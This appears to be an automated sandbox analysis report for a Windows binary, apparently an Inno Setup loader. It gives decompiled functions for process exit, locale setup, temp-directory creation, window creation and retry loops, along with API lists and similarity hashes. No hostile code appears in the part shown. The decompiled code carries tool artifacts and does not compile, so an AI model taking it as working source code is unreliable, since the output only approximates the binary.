                                                                                    • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                                                    • DestroyWindow.USER32(0009025C,004B6554), ref: 004B6514
                                                                                      • Part of subcall function 004AF1B4: Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                                                      • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                                                      • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ErrorLastMessage$DestroyDirectoryRemoveSleepWindow
                                                                                    • String ID: .tmp$0MB
                                                                                    • API String ID: 3858953238-176122739
                                                                                    • Opcode ID: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                                                    • Instruction ID: b159488041d1577a8b45ed1a1d18f26c00613076fc9a683522f38ff229f2206a
                                                                                    • Opcode Fuzzy Hash: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                                                    • Instruction Fuzzy Hash: AC615A342002009FD755EF69ED86EAA37A5EB4A308F51453AF801976B2DA3CBC51CB6D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00407750, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93threadCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 86%
                                                                                    			E00407750() {
				void* _t20;
				void* _t23;
				intOrPtr _t31;
				intOrPtr* _t33;
				void* _t46;
				struct HINSTANCE__* _t49;
				void* _t56;

				if( *0x4b7004 != 0) {
					E00407630();
					E004076B8(_t46);
					 *0x4b7004 = 0;
				}
				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
					E00407388(0x4bdbc8);
					E0040768C(0x4bdbc8);
				}
				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
					L8:
					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
						 *0x004BDBA4 = 0;
					}
					if( *((char*)(0x4bdbc0)) != 0) {
						L14:
						E004073B0();
						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
							_t15 =  *0x004BDBA8;
							if( *0x004BDBA8 != 0) {
								E0040B40C(_t15);
								_t31 =  *((intOrPtr*)(0x4bdba8));
								_t8 = _t31 + 0x10; // 0x400000
								_t49 =  *_t8;
								_t9 = _t31 + 4; // 0x400000
								if(_t49 !=  *_t9 && _t49 != 0) {
									FreeLibrary(_t49);
								}
							}
						}
						E00407388(0x4bdb98);
						if( *((char*)(0x4bdbc0)) == 1) {
							 *0x004BDBBC();
						}
						if( *((char*)(0x4bdbc0)) != 0) {
							E0040768C(0x4bdb98);
						}
						if( *0x4bdb98 == 0) {
							if( *0x4bb038 != 0) {
								 *0x4bb038();
							}
							ExitProcess( *0x4b7000); // executed
						}
						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
						_t56 = _t56 + 0xc;
						0x4b7000 = 0x4b7000;
						0x4bdb98 = 0x4bdb98;
						goto L8;
					} else {
						_t20 = E004054B4();
						_t44 = _t20;
						if(_t20 == 0) {
							goto L14;
						} else {
							goto L13;
						}
						do {
							L13:
							E00405CE8(_t44);
							_t23 = E004054B4();
							_t44 = _t23;
						} while (_t23 != 0);
						goto L14;
					}
				} else {
					do {
						_t33 =  *0x4bb054; // 0x0
						 *0x4bb054 = 0;
						 *_t33();
					} while ( *0x4bb054 != 0);
					L8:
					while(1) {
					}
				}
			}










                                                                                    0x00407764
                                                                                    0x00407766
                                                                                    0x0040776b
                                                                                    0x00407772
                                                                                    0x00407772
                                                                                    0x0040777e
                                                                                    0x00407792
                                                                                    0x0040779c
                                                                                    0x0040779c
                                                                                    0x004077a5
                                                                                    0x004077c9
                                                                                    0x004077cd
                                                                                    0x004077d6
                                                                                    0x004077d6
                                                                                    0x004077dd
                                                                                    0x004077fc
                                                                                    0x004077fc
                                                                                    0x00407805
                                                                                    0x0040780c
                                                                                    0x00407811
                                                                                    0x00407813
                                                                                    0x00407818
                                                                                    0x0040781b
                                                                                    0x0040781b
                                                                                    0x0040781e
                                                                                    0x00407821
                                                                                    0x00407828
                                                                                    0x00407828
                                                                                    0x00407821
                                                                                    0x00407811
                                                                                    0x0040782f
                                                                                    0x00407838
                                                                                    0x0040783a
                                                                                    0x0040783a
                                                                                    0x00407841
                                                                                    0x00407845
                                                                                    0x00407845
                                                                                    0x0040784d
                                                                                    0x00407856
                                                                                    0x00407858
                                                                                    0x00407858
                                                                                    0x00407861
                                                                                    0x00407861
                                                                                    0x00407873
                                                                                    0x00407873
                                                                                    0x00407875
                                                                                    0x00407876
                                                                                    0x00000000
                                                                                    0x004077df
                                                                                    0x004077df
                                                                                    0x004077e4
                                                                                    0x004077e8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004077ea
                                                                                    0x004077ea
                                                                                    0x004077ec
                                                                                    0x004077f1
                                                                                    0x004077f6
                                                                                    0x004077f8
                                                                                    0x00000000
                                                                                    0x004077ea
                                                                                    0x004077b0
                                                                                    0x004077b0
                                                                                    0x004077b0
                                                                                    0x004077b9
                                                                                    0x004077be
                                                                                    0x004077c0
                                                                                    0x00000000
                                                                                    0x004077c9
                                                                                    0x00000000
                                                                                    0x004077c9

                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                                                    • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                                                      • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                                      • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                                      • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                                      • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                    • String ID: MZP
                                                                                    • API String ID: 3490077880-2889622443
                                                                                    • Opcode ID: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                                                    • Instruction ID: 4bb8ca2865ae45d0ec72c9e6ca862cba493d08d50c1d65b63798a8296780cd14
                                                                                    • Opcode Fuzzy Hash: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                                                    • Instruction Fuzzy Hash: 76317220E087415BE721BB7A888875B76E09B45315F14897FE541A33D2D77CB884CB6F
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00407748, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86threadCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 86%
                                                                                    			E00407748() {
				intOrPtr* _t14;
				void* _t23;
				void* _t26;
				intOrPtr _t34;
				intOrPtr* _t36;
				void* _t50;
				struct HINSTANCE__* _t53;
				void* _t62;

				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
				if( *0x4b7004 != 0) {
					E00407630();
					E004076B8(_t50);
					 *0x4b7004 = 0;
				}
				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
					E00407388(0x4bdbc8);
					E0040768C(0x4bdbc8);
				}
				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
					L9:
					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
						 *0x004BDBA4 = 0;
					}
					if( *((char*)(0x4bdbc0)) != 0) {
						L15:
						E004073B0();
						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
							_t18 =  *0x004BDBA8;
							if( *0x004BDBA8 != 0) {
								E0040B40C(_t18);
								_t34 =  *((intOrPtr*)(0x4bdba8));
								_t8 = _t34 + 0x10; // 0x400000
								_t53 =  *_t8;
								_t9 = _t34 + 4; // 0x400000
								if(_t53 !=  *_t9 && _t53 != 0) {
									FreeLibrary(_t53);
								}
							}
						}
						E00407388(0x4bdb98);
						if( *((char*)(0x4bdbc0)) == 1) {
							 *0x004BDBBC();
						}
						if( *((char*)(0x4bdbc0)) != 0) {
							E0040768C(0x4bdb98);
						}
						if( *0x4bdb98 == 0) {
							if( *0x4bb038 != 0) {
								 *0x4bb038();
							}
							ExitProcess( *0x4b7000); // executed
						}
						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
						_t62 = _t62 + 0xc;
						0x4b7000 = 0x4b7000;
						0x4bdb98 = 0x4bdb98;
						goto L9;
					} else {
						_t23 = E004054B4();
						_t48 = _t23;
						if(_t23 == 0) {
							goto L15;
						} else {
							goto L14;
						}
						do {
							L14:
							E00405CE8(_t48);
							_t26 = E004054B4();
							_t48 = _t26;
						} while (_t26 != 0);
						goto L15;
					}
				} else {
					do {
						_t36 =  *0x4bb054; // 0x0
						 *0x4bb054 = 0;
						 *_t36();
					} while ( *0x4bb054 != 0);
					L9:
					while(1) {
					}
				}
			}











                                                                                    0x0040774a
                                                                                    0x00407764
                                                                                    0x00407766
                                                                                    0x0040776b
                                                                                    0x00407772
                                                                                    0x00407772
                                                                                    0x0040777e
                                                                                    0x00407792
                                                                                    0x0040779c
                                                                                    0x0040779c
                                                                                    0x004077a5
                                                                                    0x004077c9
                                                                                    0x004077cd
                                                                                    0x004077d6
                                                                                    0x004077d6
                                                                                    0x004077dd
                                                                                    0x004077fc
                                                                                    0x004077fc
                                                                                    0x00407805
                                                                                    0x0040780c
                                                                                    0x00407811
                                                                                    0x00407813
                                                                                    0x00407818
                                                                                    0x0040781b
                                                                                    0x0040781b
                                                                                    0x0040781e
                                                                                    0x00407821
                                                                                    0x00407828
                                                                                    0x00407828
                                                                                    0x00407821
                                                                                    0x00407811
                                                                                    0x0040782f
                                                                                    0x00407838
                                                                                    0x0040783a
                                                                                    0x0040783a
                                                                                    0x00407841
                                                                                    0x00407845
                                                                                    0x00407845
                                                                                    0x0040784d
                                                                                    0x00407856
                                                                                    0x00407858
                                                                                    0x00407858
                                                                                    0x00407861
                                                                                    0x00407861
                                                                                    0x00407873
                                                                                    0x00407873
                                                                                    0x00407875
                                                                                    0x00407876
                                                                                    0x00000000
                                                                                    0x004077df
                                                                                    0x004077df
                                                                                    0x004077e4
                                                                                    0x004077e8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004077ea
                                                                                    0x004077ea
                                                                                    0x004077ec
                                                                                    0x004077f1
                                                                                    0x004077f6
                                                                                    0x004077f8
                                                                                    0x00000000
                                                                                    0x004077ea
                                                                                    0x004077b0
                                                                                    0x004077b0
                                                                                    0x004077b0
                                                                                    0x004077b9
                                                                                    0x004077be
                                                                                    0x004077c0
                                                                                    0x00000000
                                                                                    0x004077c9
                                                                                    0x00000000
                                                                                    0x004077c9

                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                                                    • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                                                      • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                                      • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                                      • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                                      • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                    • String ID: MZP
                                                                                    • API String ID: 3490077880-2889622443
                                                                                    • Opcode ID: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                                                    • Instruction ID: bfc25cbdcfe625b544084418af651039c1e49876b6b13a82c314e6a817d38f33
                                                                                    • Opcode Fuzzy Hash: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                                                    • Instruction Fuzzy Hash: E3314D20E087419BE721BB7A888935B7BA09B05315F14897FE541A73D2D77CB884CB6F
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004B5000, Relevance: 6.0, APIs: 4, Instructions: 43threadCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 79%
                                                                                    			E004B5000(void* __ecx, void* __edx) {
				intOrPtr _t19;
				intOrPtr _t22;

				_push(_t22);
				_push(0x4b50d7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t22;
				 *0x4bb98c =  *0x4bb98c - 1;
				if( *0x4bb98c < 0) {
					E00405B74();
					E004051A8();
					SetThreadLocale(0x400); // executed
					E0040A250();
					 *0x4b700c = 2;
					 *0x4bb01c = 0x4036b0;
					 *0x4bb020 = 0x4036b8;
					 *0x4bb05a = 2;
					 *0x4bb060 = E0040CAA4();
					 *0x4bb008 = 0x4095a0;
					E00405BCC(E00405BB0());
					 *0x4bb068 = 0xd7b0;
					 *0x4bb344 = 0xd7b0;
					 *0x4bb620 = 0xd7b0;
					 *0x4bb050 = GetCommandLineW();
					 *0x4bb04c = E00403810();
					 *0x4bb97c = GetACP();
					 *0x4bb980 = 0x4b0;
					 *0x4bb044 = GetCurrentThreadId();
					E0040CAB8();
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(0x4b50de);
				return 0;
			}





                                                                                    0x004b5005
                                                                                    0x004b5006
                                                                                    0x004b500b
                                                                                    0x004b500e
                                                                                    0x004b5011
                                                                                    0x004b5018
                                                                                    0x004b501e
                                                                                    0x004b5023
                                                                                    0x004b502d
                                                                                    0x004b5032
                                                                                    0x004b5037
                                                                                    0x004b503e
                                                                                    0x004b5048
                                                                                    0x004b5052
                                                                                    0x004b505e
                                                                                    0x004b5063
                                                                                    0x004b5072
                                                                                    0x004b5077
                                                                                    0x004b5080
                                                                                    0x004b5089
                                                                                    0x004b5097
                                                                                    0x004b50a1
                                                                                    0x004b50ab
                                                                                    0x004b50b0
                                                                                    0x004b50bf
                                                                                    0x004b50c4
                                                                                    0x004b50c4
                                                                                    0x004b50cb
                                                                                    0x004b50ce
                                                                                    0x004b50d1
                                                                                    0x004b50d6

                                                                                    APIs
                                                                                    • SetThreadLocale.KERNEL32(00000400,00000000,004B50D7), ref: 004B502D
                                                                                      • Part of subcall function 0040A250: InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                                                      • Part of subcall function 0040A250: GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                                                      • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                                                      • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                                                      • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                                                      • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                                                      • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                                                      • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                                                      • Part of subcall function 0040CAA4: GetSystemInfo.KERNEL32 ref: 0040CAA8
                                                                                    • GetCommandLineW.KERNEL32(00000400,00000000,004B50D7), ref: 004B5092
                                                                                      • Part of subcall function 00403810: GetStartupInfoW.KERNEL32 ref: 00403821
                                                                                    • GetACP.KERNEL32(00000400,00000000,004B50D7), ref: 004B50A6
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004B50BA
                                                                                      • Part of subcall function 0040CAB8: GetVersion.KERNEL32(004B50C9,00000400,00000000,004B50D7), ref: 0040CAB8
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc$InfoThreadVersion$CommandCriticalCurrentInitializeLineLocaleSectionStartupSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2740004594-0
                                                                                    • Opcode ID: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                                                    • Instruction ID: 4c04e7183c3d5c6504f231a905193e891933426fc174ea8e71756e1f90614aff
                                                                                    • Opcode Fuzzy Hash: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                                                    • Instruction Fuzzy Hash: 46111CB04047449FE311BF76A8062267BA8EB05309B508A7FE110662E2EBFD15048FEE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004AEFE8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 73%
                                                                                    			E004AEFE8(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char* _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				int _t30;
				intOrPtr _t63;
				void* _t71;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t76;

				_t71 = __edi;
				_t54 = __ebx;
				_t75 = _t76;
				_t55 = 4;
				do {
					_push(0);
					_push(0);
					_t55 = _t55 - 1;
				} while (_t55 != 0);
				_push(_t55);
				_push(__ebx);
				_t73 = __eax;
				_t78 = 0;
				_push(_t75);
				_push(0x4af0e1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				while(1) {
					E00422D70( &_v12, _t54, _t55, _t78); // executed
					_t55 = L".tmp";
					E004AEEC8(0, _t54, L".tmp", _v12, _t71, _t73,  &_v8); // executed
					_t30 = CreateDirectoryW(E004084EC(_v8), 0); // executed
					if(_t30 != 0) {
						break;
					}
					_t54 = GetLastError();
					_t78 = _t54 - 0xb7;
					if(_t54 != 0xb7) {
						E00426F08(0x3d,  &_v32, _v8);
						_v28 = _v32;
						E00419E18( &_v36, _t54, 0);
						_v24 = _v36;
						E004232EC(_t54,  &_v40);
						_v20 = _v40;
						E00426ED8(0x81, 2,  &_v28,  &_v16);
						_t55 = _v16;
						E0041F264(_v16, 1);
						E0040711C();
					}
				}
				E00407E00(_t73, _v8);
				__eflags = 0;
				_pop(_t63);
				 *[fs:eax] = _t63;
				_push(E004AF0E8);
				E00407A80( &_v40, 3);
				return E00407A80( &_v16, 3);
			}


















                                                                                    0x004aefe8
                                                                                    0x004aefe8
                                                                                    0x004aefe9
                                                                                    0x004aefeb
                                                                                    0x004aeff0
                                                                                    0x004aeff0
                                                                                    0x004aeff2
                                                                                    0x004aeff4
                                                                                    0x004aeff4
                                                                                    0x004aeff7
                                                                                    0x004aeff8
                                                                                    0x004aeffa
                                                                                    0x004aeffc
                                                                                    0x004aeffe
                                                                                    0x004aefff
                                                                                    0x004af004
                                                                                    0x004af007
                                                                                    0x004af00a
                                                                                    0x004af011
                                                                                    0x004af019
                                                                                    0x004af020
                                                                                    0x004af030
                                                                                    0x004af037
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004af03e
                                                                                    0x004af040
                                                                                    0x004af046
                                                                                    0x004af056
                                                                                    0x004af05e
                                                                                    0x004af06a
                                                                                    0x004af072
                                                                                    0x004af07a
                                                                                    0x004af082
                                                                                    0x004af091
                                                                                    0x004af096
                                                                                    0x004af0a0
                                                                                    0x004af0a5
                                                                                    0x004af0a5
                                                                                    0x004af046
                                                                                    0x004af0b4
                                                                                    0x004af0b9
                                                                                    0x004af0bb
                                                                                    0x004af0be
                                                                                    0x004af0c1
                                                                                    0x004af0ce
                                                                                    0x004af0e0

                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF030
                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF039
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID: .tmp
                                                                                    • API String ID: 1375471231-2986845003
                                                                                    • Opcode ID: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                                                    • Instruction ID: 89b964d67460c442e7c67535b057b8112791baa86db9a38931a927ffd746d2a8
                                                                                    • Opcode Fuzzy Hash: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                                                    • Instruction Fuzzy Hash: 3A218735A041089BDB00EBE1C842ADFB3B9EB49304F50447BF800F7381DA386E058BA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040E450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E0040E450(long __eax, WCHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				WCHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				WCHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00405740();
				_t24 = CreateWindowExW(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00405730(_t13);
				return _t24;
			}








                                                                                    0x0040e457
                                                                                    0x0040e45c
                                                                                    0x0040e45e
                                                                                    0x0040e48f
                                                                                    0x0040e498
                                                                                    0x0040e4a4

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID: InnoSetupLdrWindow$STATIC
                                                                                    • API String ID: 716092398-2209255943
                                                                                    • Opcode ID: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                                                    • Instruction ID: 770f17d29583ffea265d4876c6cd55b491c436ce5e2cc0b006eebdc9bc405b2a
                                                                                    • Opcode Fuzzy Hash: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                                                    • Instruction Fuzzy Hash: 73F07FB6600118AF9B84DE9EDC85E9B77ECEB4D264B05412ABA08E7201D634ED118BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004AF1B4, Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004AF1B4(long __eax, intOrPtr __edx, long _a4, long _a8) {
				intOrPtr _v8;
				long _t5;
				long _t9;
				void* _t10;
				void* _t13;
				void* _t15;
				void* _t16;

				_t5 = __eax;
				_v8 = __edx;
				_t9 = __eax;
				_t15 = _t10 - 1;
				if(_t15 < 0) {
					L10:
					return _t5;
				}
				_t16 = _t15 + 1;
				_t13 = 0;
				while(1) {
					_t19 = _t13 - 1;
					if(_t13 != 1) {
						__eflags = _t13 - 1;
						if(__eflags > 0) {
							Sleep(_a4);
						}
					} else {
						Sleep(_a8);
					}
					_t5 = E00427154(_t9, _v8, _t19); // executed
					if(_t5 != 0) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 2) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 3) {
						goto L10;
					}
					_t13 = _t13 + 1;
					_t16 = _t16 - 1;
					if(_t16 != 0) {
						continue;
					}
					goto L10;
				}
				goto L10;
			}










                                                                                    0x004af1b4
                                                                                    0x004af1bb
                                                                                    0x004af1be
                                                                                    0x004af1c2
                                                                                    0x004af1c5
                                                                                    0x004af213
                                                                                    0x004af213
                                                                                    0x004af213
                                                                                    0x004af1c7
                                                                                    0x004af1c8
                                                                                    0x004af1ca
                                                                                    0x004af1ca
                                                                                    0x004af1cd
                                                                                    0x004af1da
                                                                                    0x004af1dd
                                                                                    0x004af1e3
                                                                                    0x004af1e3
